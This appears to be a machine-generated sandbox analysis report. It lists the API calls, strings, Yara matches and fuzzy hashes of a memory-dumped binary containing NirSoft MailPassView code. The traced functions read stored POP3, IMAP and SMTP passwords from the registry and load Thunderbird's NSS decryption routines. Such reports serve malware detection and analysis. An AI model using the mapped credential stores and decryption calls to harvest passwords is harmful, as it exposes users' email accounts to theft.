                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040A8F0
                                                                                                    • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040A950
                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                                                                    • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                                                                    • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                                                                    • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                                                                    • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                                                                    • strlen.MSVCRT ref: 0040AA82
                                                                                                    • strlen.MSVCRT ref: 0040AA90
                                                                                                    • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                                                                      • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                                                                      • Part of subcall function 00404925: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404966
                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AB37
                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AB4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                                    • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                                                                    • API String ID: 873469642-860065374
                                                                                                    • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                                    • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                                                                    • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                                    • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040DB39, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EndDialog.USER32(?,?), ref: 0040DB81
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040DB99
                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040DBB8
                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040DBC5
                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040DBCE
                                                                                                    • memset.MSVCRT ref: 0040DBF6
                                                                                                    • memset.MSVCRT ref: 0040DC16
                                                                                                    • memset.MSVCRT ref: 0040DC34
                                                                                                    • memset.MSVCRT ref: 0040DC4D
                                                                                                    • memset.MSVCRT ref: 0040DC6B
                                                                                                    • memset.MSVCRT ref: 0040DC84
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0040DC8C
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040DCB1
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040DCE7
                                                                                                    • memset.MSVCRT ref: 0040DD3E
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040DD4C
                                                                                                    • memcpy.MSVCRT ref: 0040DD7B
                                                                                                    • strcpy.MSVCRT(?,00000000), ref: 0040DD9D
                                                                                                    • sprintf.MSVCRT ref: 0040DE08
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040DE21
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040DE2B
                                                                                                    • SetFocus.USER32(00000000), ref: 0040DE32
                                                                                                    Strings
                                                                                                    • {Unknown}, xrefs: 0040DBFB
                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                    • API String ID: 138940113-3474136107
                                                                                                    • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                                    • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                                                                    • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                                    • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040DEEE, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DF0F
                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                    • memset.MSVCRT ref: 0040DF62
                                                                                                    • strlen.MSVCRT ref: 0040DF6C
                                                                                                    • strlen.MSVCRT ref: 0040DF7A
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                    • API String ID: 1296682400-4029219660
                                                                                                    • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                                    • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                                                    • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                                    • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402606, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004026AE
                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,7661E430,?,00000000), ref: 004026EC
                                                                                                    • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$QueryValuememset
                                                                                                    • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                    • API String ID: 3373037483-1627711381
                                                                                                    • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                                    • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                                                    • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                                    • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004027D0, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 118stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402878
                                                                                                      • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                                                                    • strcpy.MSVCRT(?,?,7661E430,?,00000000), ref: 004028B2
                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,7661E430,?,00000000), ref: 00402980
                                                                                                      • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                                                                    • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                    • API String ID: 2416467034-4086712241
                                                                                                    • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                    • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                                                                    • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                    • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F435, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F459
                                                                                                    • memset.MSVCRT ref: 0040F471
                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.ADVAPI32(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                    • memset.MSVCRT ref: 0040F4A9
                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                    • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                                                    • memset.MSVCRT ref: 0040F4F6
                                                                                                    • memset.MSVCRT ref: 0040F50E
                                                                                                    • _snprintf.MSVCRT ref: 0040F52B
                                                                                                    • _mbsrchr.MSVCRT ref: 0040F555
                                                                                                    • _mbsicmp.MSVCRT ref: 0040F589
                                                                                                    • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                                                    • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                                                    • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                    • API String ID: 3269028891-3267283505
                                                                                                    • Opcode ID: f901367a664cbfa18259b8fc0a4894229f15e9fad39f991ef204cd9081bc2b01
                                                                                                    • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                                                                    • Opcode Fuzzy Hash: f901367a664cbfa18259b8fc0a4894229f15e9fad39f991ef204cd9081bc2b01
                                                                                                    • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F126, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F147
                                                                                                    • memset.MSVCRT ref: 0040F15B
                                                                                                    • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                                                    • sprintf.MSVCRT ref: 0040F1A3
                                                                                                    • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                                                    • sprintf.MSVCRT ref: 0040F1DA
                                                                                                    • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                                                    • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                                                    • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                                                    • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                                                    • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                                                    • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcat$memsetsprintf$strcpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 1662040868-1996832678
                                                                                                    • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                                    • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                                                    • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                                    • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AF17, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040AF3C
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                                                                    • strrchr.MSVCRT ref: 0040AF5C
                                                                                                    • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                                                                    • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                                                                    • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                                    • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                    • API String ID: 1301239246-2014360536
                                                                                                    • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                                    • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                                                                    • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                                    • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409482, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004094A2
                                                                                                    • memset.MSVCRT ref: 004094C5
                                                                                                    • memset.MSVCRT ref: 004094DB
                                                                                                    • memset.MSVCRT ref: 004094EB
                                                                                                    • sprintf.MSVCRT ref: 0040951F
                                                                                                    • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                                                    • sprintf.MSVCRT ref: 004095ED
                                                                                                    • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                                                      • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                                                    • strcpy.MSVCRT(?,?), ref: 00409601
                                                                                                    • sprintf.MSVCRT ref: 00409650
                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,76020A60,00000000,?,?,004092ED,00000001,00412B1C,76020A60), ref: 00405F17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                    • API String ID: 2822972341-601624466
                                                                                                    • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                                    • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                                                                    • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                                    • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409EC4, Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409F11
                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409F46
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 00409F7B
                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 00409F97
                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                                                    • DeleteObject.GDI32(?), ref: 00409FDB
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409FFC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                                    • String ID:
                                                                                                    • API String ID: 3411798969-0
                                                                                                    • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                                    • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                                                    • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                                    • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B841, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                                                    • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _stricmp
                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                    • API String ID: 2884411883-1959339147
                                                                                                    • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                                    • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                                                    • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                                    • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F243, Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$memset$strcpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 898937289-3842416460
                                                                                                    • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                                    • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                                                    • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                                    • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E0DA, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2449869053-232097475
                                                                                                    • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                                    • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                                                    • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                                    • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410525, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7661E520), ref: 004047A8
                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                    • strlen.MSVCRT ref: 0041054C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                                                    • memset.MSVCRT ref: 004105A8
                                                                                                    • memset.MSVCRT ref: 004105C5
                                                                                                    • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00410637
